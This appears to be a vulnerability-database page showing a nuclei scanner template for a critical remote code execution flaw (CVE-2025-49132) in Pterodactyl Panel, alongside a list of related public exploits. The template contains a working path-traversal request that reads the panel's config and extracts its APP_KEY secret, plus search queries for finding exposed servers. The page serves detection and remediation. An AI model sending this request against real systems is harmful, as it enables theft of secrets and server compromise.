Lucene search
K

Pterodactyl Panel - Remote Code Execution

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 1440 Views

Critical remote code execution vulnerability in Pterodactyl Panel allows unauthorized code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-49132
12 Feb 202616:19
githubexploit
GithubExploit
Exploit for CVE-2025-49132
16 Feb 202612:58
githubexploit
GithubExploit
Exploit for CVE-2025-49132
11 Feb 202612:18
githubexploit
GithubExploit
Exploit for CVE-2025-49132
7 Feb 202621:36
githubexploit
GithubExploit
Exploit for CVE-2025-49132
25 Jun 202518:05
githubexploit
GithubExploit
Exploit for CVE-2025-49132
8 Feb 202612:28
githubexploit
GithubExploit
Exploit for CVE-2025-49132
10 Feb 202614:21
githubexploit
GithubExploit
Exploit for CVE-2025-49132
23 Jun 202520:51
githubexploit
GithubExploit
Exploit for CVE-2025-49132
11 Feb 202608:19
githubexploit
GithubExploit
Exploit for CVE-2025-49132
18 Aug 202512:10
githubexploit
Rows per page
id: CVE-2025-49132

info:
  name: Pterodactyl Panel - Remote Code Execution
  severity: critical
  author: darses
  description: |
    Pterodactyl is a free, open-source game server management panel. Using the /locales/locale.json with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated.
  impact: |
    With the ability to execute arbitrary code, this vulnerability can be exploited in an infinite number of ways. It could be used to gain access to the Panel's server, read credentials from the Panel's config (.env or otherwise), extract sensitive information from the database (such as user details [username, email, first and last name, hashed password, ip addresses, etc]), access files of servers managed by the panel, etc.
  remediation: |
    Upgrade to Pterodactyl version 1.11.11+. There are no software workarounds for this vulnerability, but use of an external Web Application Firewall (WAF) could help mitigate this attack.
  reference:
    - https://github.com/pterodactyl/panel/security/advisories/GHSA-24wv-6c99-f843
    - https://github.com/pterodactyl/panel/commit/24c82b0e335fb5d7a844226b08abf9f176e592f0
    - https://github.com/pterodactyl/panel/releases/tag/v1.11.11
  classification:
    epss-score: 0.13105
    epss-percentile: 0.95884
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-49132
    cwe-id: CWE-20
  metadata:
    verified: true
    vendor: pterodactyl
    product: panel
    shodan-query:
      - title:"Pterodactyl"
      - http.favicon.hash:-456405319
      - http.favicon.hash:846001371
      - "Set-Cookie: pterodactyl_session="
    fofa-query:
      - title="Pterodactyl"
      - icon_hash="-456405319"
      - icon_hash="846001371"
      - "Set-Cookie: pterodactyl_session="
  tags: pterodactyl, cve, cve2025, rce, lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '{"app":{"version":'
          - '"key":"base64{{'
        condition: and

    extractors:
      - type: json
        name: APP_KEY
        json:
          - ".[] | .app.key"
# digest: 4a0a00473045022100f957d701c81dd9b429e157bf145ddfd23bbfcfaae878af050bdb7f3b0414c6070220531cd523549cced90bc137ea99c1c6d99586382f5358c268ae5362f6377b062d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.110
EPSS0.13105
SSVC
1440